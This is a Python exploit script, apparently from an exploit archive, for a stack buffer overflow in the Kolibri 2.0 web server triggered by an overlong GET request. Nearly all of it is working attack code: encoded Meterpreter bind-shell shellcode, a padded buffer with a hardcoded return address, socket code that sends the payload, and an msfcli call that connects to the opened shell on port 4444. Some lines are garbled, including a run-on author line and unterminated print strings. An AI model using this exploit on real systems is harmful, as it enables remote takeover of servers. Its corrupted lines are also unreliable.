Kolibri version 2.0 GET request stack buffer overflow exploit that spawns a bind

1. Kolibri version 2.0 GET request stack buffer overflow exploit that spawns a bindshell on TCP/4444.
2.  
3.  
4. #!/usr/bin/python
5. # Exploit Title: Kolibri GET request Stack buffer Overflow
6.  
7.  
8.  
9. # Exploit Authommmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
10. # Tested on: Windows XP SP3,
11. # A buffer overflow is triggered when a long GET command is sent to the server.
12.  
13. import socket, sys, os, time
14.  
15. if len(sys.argv) != 3:
16. print "[*] Uso: %s <Ip Victima> <Puerto> \n" % sys.argv[0]
17. print "[*] Exploit created by
18. print "[*] https://www.in
19. sys.exit(0)
20. host = sys.argv[1]
21. port = int(sys.argv[2])
22.  
23. #./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -t c -b '\x00\xff\x0a\x0d\x20\x40'
24. shellcode = (
25. "\x29\xc9\x83\xe9\xb5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
26. "\xaa\x86\x33\x5f\x83\xee\xfc\xe2\xf4\x56\x6e\xba\x5f\xaa\x86"
27. "\x53\xd6\x4f\xb7\xe1\x3b\x21\xd4\x03\xd4\xf8\x8a\xb8\x0d\xbe"
28. "\x0d\x41\x77\xa5\x31\x79\x79\x9b\x79\x02\x9f\x06\xba\x52\x23"
29. "\xa8\xaa\x13\x9e\x65\x8b\x32\x98\x48\x76\x61\x08\x21\xd4\x23"
30. "\xd4\xe8\xba\x32\x8f\x21\xc6\x4b\xda\x6a\xf2\x79\x5e\x7a\xd6"
31. "\xb8\x17\xb2\x0d\x6b\x7f\xab\x55\xd0\x63\xe3\x0d\x07\xd4\xab"
32. "\x50\x02\xa0\x9b\x46\x9f\x9e\x65\x8b\x32\x98\x92\x66\x46\xab"
33. "\xa9\xfb\xcb\x64\xd7\xa2\x46\xbd\xf2\x0d\x6b\x7b\xab\x55\x55"
34. "\xd4\xa6\xcd\xb8\x07\xb6\x87\xe0\xd4\xae\x0d\x32\x8f\x23\xc2"
35. "\x17\x7b\xf1\xdd\x52\x06\xf0\xd7\xcc\xbf\xf2\xd9\x69\xd4\xb8"
36. "\x6d\xb5\x02\xc2\xb5\x01\x5f\xaa\xee\x44\x2c\x98\xd9\x67\x37"
37. "\xe6\xf1\x15\x58\x55\x53\x8b\xcf\xab\x86\x33\x76\x6e\xd2\x63"
38. "\x37\x83\x06\x58\x5f\x55\x53\x63\x0f\xfa\xd6\x73\x0f\xea\xd6"
39. "\x5b\xb5\xa5\x59\xd3\xa0\x7f\x11\x02\x84\xf9\xee\x31\x5f\xbb"
40. "\xda\xba\xb9\xc0\x96\x65\x08\xc2\x44\xe8\x68\xcd\x79\xe6\x0c"
41. "\xfd\xee\x84\xb6\x92\x79\xcc\x8a\xf9\xd5\x64\x37\xde\x6a\x08"
42. "\xbe\x55\x53\x64\xc8\xc2\xf3\x5d\x12\xcb\x79\xe6\x35\xaa\xec"
43. "\x37\x09\xfd\xee\x31\x86\x62\xd9\xcc\x8a\x21\xb0\x59\x1f\xc2"
44. "\x86\x23\x5f\xaa\xd0\x59\x5f\xc2\xde\x97\x0c\x4f\x79\xe6\xcc"
45. "\xf9\xec\x33\x09\xf9\xd1\x5b\x5d\x73\x4e\x6c\xa0\x7f\x87\xf0"
46. "\x76\x6c\x03\xc5\x2a\x46\x45\x33\x5f"
47. )
48.  
49. nop = "A" * 33 + '\x90' * 20
50. junk = "C" *(515-(len(nop)+len(shellcode)))
51. opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
52. eip = '\x63\x46\x92\x7c'
53. #7c86467b 7C924663 call esp
54. buffer = nop + shellcode + junk + eip + opcode + "B" * 60
55.  
56. req = ("GET /" + buffer + " HTTP/1.1\r\n"
57. "Host: " + host + ":" + str(port) + "\r\n"
58. "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
59. "Connection: keep-alive\r\n\r\n")
60. print " [+] Connecting to %s:%d" % (host, port)
61. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
62.  
63. try:
64. s.connect((host, port))
65. print " [+] Sending payload.." + "nop: " + str(len(nop)) + " junk: " + str(len(junk)) + " shellcode: " + str(len(shellcode))
66. s.send(req)
67. data = s.recv(1024)
68. print " [+] Closing connection.."
69. s.close()
70. print "[+] Exploit Sent Successfully"
71. print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
72. print "\r"
73. time.sleep(3)
74. os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E")
75. print "[-] Connection lost from " + host + ":4444 \r"
76. except:
77. print "[-] Could not connect to " + host + ":4444\r"
78. sys.exit(0)